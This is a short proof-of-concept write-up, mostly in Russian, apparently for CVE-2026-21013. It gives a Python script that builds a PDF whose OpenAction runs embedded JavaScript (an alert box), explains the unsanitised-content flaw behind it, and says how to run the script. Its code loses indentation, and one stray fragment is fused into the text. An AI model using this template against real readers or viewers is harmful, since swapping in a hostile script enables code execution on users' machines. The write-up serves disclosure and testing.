
Генерирует PDF-файл со встроенным JavaScript для демонстрации CVE-2026-21013 — инъекции OpenAction, приводящей к выполнению скриптов в уязвимых PDF-ридерах.
# generate_pdf_js_inject.py - Creates a PDF with embedded JavaScript
pdf = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /OpenAction << /S /JavaScript /JS (app.alert('XSS')) >>
>>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""
with open("malicious.pdf", "wb") as f:
f.write(pdf)
print("malicious.pdf created. When opened in a vulnerable PDF reader, it will execute JavaScript.")
Генератор PDF не очищает пользовательский контент перед встраиванием его в PDF-файл. Злоумышленник может внедрить запись JavaScript , которая выполняется при открытии документа, что приводит к межсайтовому скриптингу (в веб-просмотрщиках) или локальному выполнению кода (в настольных программах просмотра с полной поддержкой JS).
/OpenActionЗапустите генератор:
python generate_pdf_js_inject.py
Откройте полученный malicious.pdf в программе просмотра PDF с поддержкой JavaScript — появится окно предупреждения.